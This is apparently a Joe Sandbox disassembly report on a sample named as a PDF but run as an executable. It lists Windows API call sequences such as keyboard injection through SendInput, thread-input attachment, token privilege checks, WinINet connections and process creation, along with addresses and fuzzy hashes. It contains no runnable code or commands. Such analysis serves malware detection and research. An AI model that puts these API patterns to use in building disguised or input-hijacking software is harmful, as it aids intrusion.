• API String ID: 3321077145-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B68B4D
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• ClientToScreen.USER32(?,?), ref: 00B6AE1A
• GetWindowRect.USER32(?,?), ref: 00B6AE90
• PtInRect.USER32(?,?,00B6C304), ref: 00B6AEA0
• MessageBeep.USER32(00000000), ref: 00B6AF11
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B41037
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00B41053
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B410B9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B4110B
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B41176
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00B41192
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00B411F1
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B41243
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B1644B
• __isleadbyte_l.LIBCMT ref: 00B16479
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B164A7
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B164DD
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
APIs
• GetForegroundWindow.USER32 ref: 00B65189
  • Part of subcall function 00B4387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B43897
  • Part of subcall function 00B4387D: GetCurrentThreadId.KERNEL32 ref: 00B4389E
  • Part of subcall function 00B4387D: AttachThreadInput.USER32(00000000,?,00B452A7), ref: 00B438A5
• GetCaretPos.USER32(?), ref: 00B6519A
• ClientToScreen.USER32(00000000,?), ref: 00B651D5
• GetForegroundWindow.USER32 ref: 00B651DB
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
APIs
  • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
• GetCursorPos.USER32(?), ref: 00B6C7C2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B1BBFB,?,?,?,?,?), ref: 00B6C7D7
• GetCursorPos.USER32(?), ref: 00B6C824
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B1BBFB,?,?,?), ref: 00B6C85E
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
APIs
  • Part of subcall function 00B38652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B38669
  • Part of subcall function 00B38652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B38673
  • Part of subcall function 00B38652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B38682
  • Part of subcall function 00B38652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B38689
  • Part of subcall function 00B38652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B3869F
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B38BEB
• _memcmp.LIBCMT ref: 00B38C0E
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B38C44
• HeapFree.KERNEL32(00000000), ref: 00B38C4B
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• API String ID: 1592001646-0
• Opcode ID: 584e2572523d6d9a41a234fee6b6515f1a0188f3326ed0d0b57e9c8c492e563e
• Instruction ID: ba476d31aa104a0f6c94b7104e6f2213611aad75e28f95e2cb5974fc5e22e031
• Instruction Fuzzy Hash: 1D21AC71E01209EFCB00CFA4C955BEEB7F8EF40340F644099E554A7240EB75AE06CB61
APIs
• __setmode.LIBCMT ref: 00B00BF2
  • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B47B20,?,?,00000000), ref: 00AE5B8C
  • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B47B20,?,?,00000000,?,?), ref: 00AE5BB0
• _fprintf.LIBCMT ref: 00B00C29
• OutputDebugStringW.KERNEL32(?), ref: 00B36331
  • Part of subcall function 00B04CDA: _flsall.LIBCMT ref: 00B04CF3
• __setmode.LIBCMT ref: 00B00C5E
Similarity
• API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
• String ID:
• API String ID: 521402451-0
• Opcode ID: 5e6ad3c49e996c6752b00d2ab60034e04f2bf3e638964b17253e5ef1cb3dcd33
• Instruction ID: 3e61ef3332ff1028db49140622369d58750dd1e2ea44ee2951adf2ba4813e04f
• Instruction Fuzzy Hash: 8A1136729042047EDB14B7B9AC83ABE7FE8DF45320F1441EAF204971E2DF605D819795
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B51A97
  • Part of subcall function 00B51B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B51B40
  • Part of subcall function 00B51B21: InternetCloseHandle.WININET(00000000), ref: 00B51BDD
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
• Opcode ID: b43e1c6aff52642442f693a0874e3eaa08e656bb127c4622d487e7f96ef11153
• Instruction ID: a3a54a688ea6424f55e61200a96e03b8c1890a1be87c9546922a447ff7c6a0a9
• Instruction Fuzzy Hash: 4721A135201601BFEB129F649C41FBAB7EDFF48702F14489AFE1196690EB71D8199BA0
APIs
  • Part of subcall function 00B3F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00B3E1C4,?,?,?,00B3EFB7,00000000,000000EF,00000119,?,?), ref: 00B3F5BC
  • Part of subcall function 00B3F5AD: lstrcpyW.KERNEL32(00000000,?,?,00B3E1C4,?,?,?,00B3EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B3F5E2
  • Part of subcall function 00B3F5AD: lstrcmpiW.KERNEL32(00000000,?,00B3E1C4,?,?,?,00B3EFB7,00000000,000000EF,00000119,?,?), ref: 00B3F613
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,00B3EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B3E1DD
• lstrcpyW.KERNEL32(00000000,?,?,00B3EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B3E203
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00B3EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B3E237
Strings
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: 66e3277ee0f2c49a189c863ac9ff7870b9773a4a6f4af6092515014ecfecdc71
• Instruction ID: 2bc4aacc7403d0385bd6e70c2bd8d33622cdad797c3da4738d2b85682a56d787
• Instruction Fuzzy Hash: 25117C36200246EFCB25AF64DC45A7A77E9FF85350F50406AF816CB2A0EB71D85197A0
APIs
• _free.LIBCMT ref: 00B15351
  • Part of subcall function 00B0594C: __FF_MSGBANNER.LIBCMT ref: 00B05963
  • Part of subcall function 00B0594C: __NMSG_WRITE.LIBCMT ref: 00B0596A
  • Part of subcall function 00B0594C: RtlAllocateHeap.NTDLL(01050000,00000000,00000001,00000000,?,?,?,00B01013,?), ref: 00B0598F
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 1dc0530c5d40596932e58a36022c2f1ec80b2852c0b7ac431f3c4f2e1119b589
• Instruction ID: 112af60bd330b5efad37ce6e00cf22fd459141d7790801eed3403caa22541a62
• Instruction Fuzzy Hash: 0F112B32404A05EFCB312F70BC4569D3BD8AF903E0B6046BAF456D71D0DFB48A809758
APIs
• _memset.LIBCMT ref: 00AE4560
  • Part of subcall function 00AE410D: _memset.LIBCMT ref: 00AE418D
  • Part of subcall function 00AE410D: _wcscpy.LIBCMT ref: 00AE41E1
  • Part of subcall function 00AE410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AE41F1
• KillTimer.USER32(?,00000001,?,?), ref: 00AE45B5
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AE45C4
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B1D6CE
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: a22c094a71bffb9a857dd9f64cb9b735a0d420ff7f236607b4c2a71ff02f3f79
• Instruction ID: 1d676b0e8d2551e128f040a4480d117ad45372cf8ef2a53c8e0bf6c07f48f0f0
• Instruction Fuzzy Hash: A521A4B0904794AFEB328B24DC95BFBBBEC9F05308F44009EE69E57281C7B45E849B51
APIs
  • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B47B20,?,?,00000000), ref: 00AE5B8C
  • Part of subcall function 00AE5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B47B20,?,?,00000000,?,?), ref: 00AE5BB0
• gethostbyname.WSOCK32(?,?,?), ref: 00B566AC
• WSAGetLastError.WSOCK32(00000000), ref: 00B566B7
• _memmove.LIBCMT ref: 00B566E4
• inet_ntoa.WSOCK32(?), ref: 00B566EF
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: 319298e7f82e7b89aea2533dd5a977f9bca97ffafed963cb59b536d0e1666e5f
• Instruction ID: 64dd76a0e3782dfd066717969bcbd9b1bac5394e83fe577d6b18dd5f16c94f9e
• Instruction Fuzzy Hash: B8116035900509AFCB04EBA5EE86DEEB7B8EF48315B1440A5F906A71A1DF70AE04CB61
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00B39043
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B39055
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B3906B
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B39086
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: bc923fea257c710168e751a87ba1695bcd09334a65d7bc7396e3f2133814e421
• Instruction ID: 8fc3c433ebc54917c623648ba786a58fc22c8dd28a37e6b77e695a42b272e342
• Instruction Fuzzy Hash: E5112E79901218FFDB11DFA5CD85EADBBB4FB48710F204095E904B7290D6716E50DB94
APIs
  • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
• DefDlgProcW.USER32(?,00000020,?), ref: 00AE12D8
• GetClientRect.USER32(?,?), ref: 00B1B84B
• GetCursorPos.USER32(?), ref: 00B1B855
• ScreenToClient.USER32(?,?), ref: 00B1B860
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: c551057a020ed67b37da770552268b385e9952fbd753f248f92bbf2dcde03965
• Instruction ID: 7dca236a59ed3cc1f23b626d0ca23c5183f76a6a885bac5386e92b78f7bf8245
• Instruction Fuzzy Hash: AE11283590006AABCB00DF95DC859FE77B8FB05300F1004A6FA11E7150CB74BA528BA5
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B401FD,?,00B41250,?,00008000), ref: 00B4166F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B401FD,?,00B41250,?,00008000), ref: 00B41694
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B401FD,?,00B41250,?,00008000), ref: 00B4169E
• Sleep.KERNEL32(?,?,?,?,?,?,?,00B401FD,?,00B41250,?,00008000), ref: 00B416D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CounterPerformanceQuerySleep
                                                                          • String ID:
                                                                          • API String ID: 2875609808-0
                                                                          • Opcode ID: 97ecf11aebee225ada30420e5eebcfe7d0a3e913fed1d9e86bf20e819e1efaa6
                                                                          • Instruction ID: 2470bcd13c9db3226db277cd06118e18992711576ec26db09e7a9d71b98418f0
                                                                          • Opcode Fuzzy Hash: 97ecf11aebee225ada30420e5eebcfe7d0a3e913fed1d9e86bf20e819e1efaa6
                                                                          • Instruction Fuzzy Hash: DB113031C0151DD7CF009FA9E984AFEBBB8FF09751F064495D940B6180CB749690AB95
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction ID: fe5fb4c47473e8db816b6e24c9bac1773000a4dbbf5a8eff2f6a0eb9acdd3b5a
                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction Fuzzy Hash: 2501833208414ABBCF125E84DC41CEE3FB2FF2A350B948595FA1856031CA37C9B2AB81
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00B6B59E
                                                                          • ScreenToClient.USER32(?,?), ref: 00B6B5B6
                                                                          • ScreenToClient.USER32(?,?), ref: 00B6B5DA
                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6B5F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          • Opcode ID: d863e93303c86fded5daac16233debf2eb3440d871c0c93d8a33ecf736aac8c8
                                                                          • Instruction ID: 5469daecd0f32b4b52c115811a33fdc510cf178a81b6e4de7fc20f8cc5486d8f
                                                                          • Opcode Fuzzy Hash: d863e93303c86fded5daac16233debf2eb3440d871c0c93d8a33ecf736aac8c8
                                                                          • Instruction Fuzzy Hash: 331164B5D0020AEFDB01DF99D4449EEBBF9FB18310F104166E915E3260D775AA51CF50
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B6B8FE
                                                                          • _memset.LIBCMT ref: 00B6B90D
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BA7F20,00BA7F64), ref: 00B6B93C
                                                                          • CloseHandle.KERNEL32 ref: 00B6B94E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                          • String ID:
                                                                          • API String ID: 3277943733-0
                                                                          • Opcode ID: 226e37064d3f91b93836efc34057c3af7621d1bf81ff870883610c7d0ebba3b3
                                                                          • Instruction ID: c321da806bd86b548593c9d52f0d0291935c508b840ea67891ac81121196398c
                                                                          • Opcode Fuzzy Hash: 226e37064d3f91b93836efc34057c3af7621d1bf81ff870883610c7d0ebba3b3
                                                                          • Instruction Fuzzy Hash: 46F0F4B258C3957FE2106765AC4AF7B7ADCDB0A754F004061FA08D62D1EF765A1087A8
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00B46E88
                                                                            • Part of subcall function 00B4794E: _memset.LIBCMT ref: 00B47983
                                                                          • _memmove.LIBCMT ref: 00B46EAB
                                                                          • _memset.LIBCMT ref: 00B46EB8
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00B46EC8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                          • String ID:
                                                                          • API String ID: 48991266-0
                                                                          • Opcode ID: 8aee7bac81a3d7da60c96ed3a085a04e3d4ac3d46ddcf602f7d8e1b0b807fe88
                                                                          • Instruction ID: 1ee9e9d9cda023490a5d297dc34efa06e76e8be079eead73101bcf3e0c3cd3aa
                                                                          • Opcode Fuzzy Hash: 8aee7bac81a3d7da60c96ed3a085a04e3d4ac3d46ddcf602f7d8e1b0b807fe88
                                                                          • Instruction Fuzzy Hash: 57F0543A104210BBCF016F55EC85A59BB69EF45320B0480A1FE085F256CB75A911DBB4
                                                                          APIs
                                                                            • Part of subcall function 00AE12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AE134D
                                                                            • Part of subcall function 00AE12F3: SelectObject.GDI32(?,00000000), ref: 00AE135C
                                                                            • Part of subcall function 00AE12F3: BeginPath.GDI32(?), ref: 00AE1373
                                                                            • Part of subcall function 00AE12F3: SelectObject.GDI32(?,00000000), ref: 00AE139C
                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B6C030
                                                                          • LineTo.GDI32(00000000,?,?), ref: 00B6C03D
                                                                          • EndPath.GDI32(00000000), ref: 00B6C04D
                                                                          • StrokePath.GDI32(00000000), ref: 00B6C05B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                          • String ID:
                                                                          • API String ID: 1539411459-0
                                                                          • Opcode ID: 87dd5e4ea60c584ce43e04515a6bf92906390de53dd9c60f8e54d2693575b98e
                                                                          • Instruction ID: 9c138d8a6a5b68d71202e8b7bd39d6b53cb24069aa7d9324d6f5c630ccfa64da
                                                                          • Opcode Fuzzy Hash: 87dd5e4ea60c584ce43e04515a6bf92906390de53dd9c60f8e54d2693575b98e
                                                                          • Instruction Fuzzy Hash: D6F0BE3100525ABBDB122F51AC0AFEE3F98AF06310F044011FA11620E28BBD0550CFE5
                                                                          APIs
                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B3A399
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3A3AC
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00B3A3B3
                                                                          • AttachThreadInput.USER32(00000000), ref: 00B3A3BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 2710830443-0
                                                                          • Opcode ID: 23f85a4531b5114d610ee98d583248c7b770aab80b7d0b19688df76eb56a12c2
                                                                          • Instruction ID: 4831b1530dab8663f2a2af69dd35c73df4e941837471dcf4a978cdc3b79a2f3b
                                                                          • Opcode Fuzzy Hash: 23f85a4531b5114d610ee98d583248c7b770aab80b7d0b19688df76eb56a12c2
                                                                          • Instruction Fuzzy Hash: 6DE06D31141328BADB201FA2EC0CEE73F5CFF167A1F108034F508960A0CAB5C540CBA1
                                                                          APIs
                                                                          • GetSysColor.USER32(00000008), ref: 00AE2231
                                                                          • SetTextColor.GDI32(?,000000FF), ref: 00AE223B
                                                                          • SetBkMode.GDI32(?,00000001), ref: 00AE2250
                                                                          • GetStockObject.GDI32(00000005), ref: 00AE2258
                                                                          • GetWindowDC.USER32(?,00000000), ref: 00B1C0D3
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B1C0E0
                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00B1C0F9
                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00B1C112
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00B1C132
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00B1C13D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                          • String ID:
                                                                          • API String ID: 1946975507-0
                                                                          • Opcode ID: 6461151ac5600d5ceb7ce49ccd0f3668d6d1df2d92e1d8e4673b7049de0659f8
                                                                          • Instruction ID: 62099b0ac864c57e1cb30678e060175d441d1c896474889a5c17a75805b5b185
                                                                          • Opcode Fuzzy Hash: 6461151ac5600d5ceb7ce49ccd0f3668d6d1df2d92e1d8e4673b7049de0659f8
                                                                          • Instruction Fuzzy Hash: 64E06D32544245EBDB215FA4FC0D7E83F14EB16336F0083A6FA69A80E18BB549D0DB12
                                                                          APIs
                                                                          • GetCurrentThread.KERNEL32 ref: 00B38C63
                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B3882E), ref: 00B38C6A
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B3882E), ref: 00B38C77
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B3882E), ref: 00B38C7E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                          • String ID:
                                                                          • API String ID: 3974789173-0
                                                                          • Opcode ID: 65e9f77b6a9c837475c206f7388a6f7ee90331d58d0f23ecd5d7cdd13d7d7572
                                                                          • Instruction ID: 41b6713dcfddffc9a6167eb5e948d4a17ba9ad3c924ae016129747b7e868d4ec
                                                                          • Opcode Fuzzy Hash: 65e9f77b6a9c837475c206f7388a6f7ee90331d58d0f23ecd5d7cdd13d7d7572
                                                                          • Instruction Fuzzy Hash: D1E04F36646312ABD7205FB07D0CB663BA8EF50792F244868F245CA080DE7894418B61
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00B22187
                                                                          • GetDC.USER32(00000000), ref: 00B22191
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B221B1
                                                                          • ReleaseDC.USER32(?), ref: 00B221D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
